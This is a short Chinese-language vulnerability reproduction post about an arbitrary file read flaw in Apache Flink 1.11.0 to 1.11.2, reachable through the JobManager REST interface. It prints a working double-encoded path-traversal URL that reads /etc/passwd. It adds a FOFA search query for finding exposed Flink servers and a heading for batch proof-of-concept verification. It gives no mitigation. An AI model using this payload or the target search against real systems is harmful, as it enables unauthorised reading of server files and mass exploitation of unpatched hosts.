一、漏洞概述

Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、影响范围

Apache Flink 1.11.0
Apache Flink 1.11.1
Apache Flink 1.11.2

三、访问页面

四、漏洞复现

/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

五、漏洞利用

1、fofa:app="Apache Flink"

2、POC批量验证

更多推荐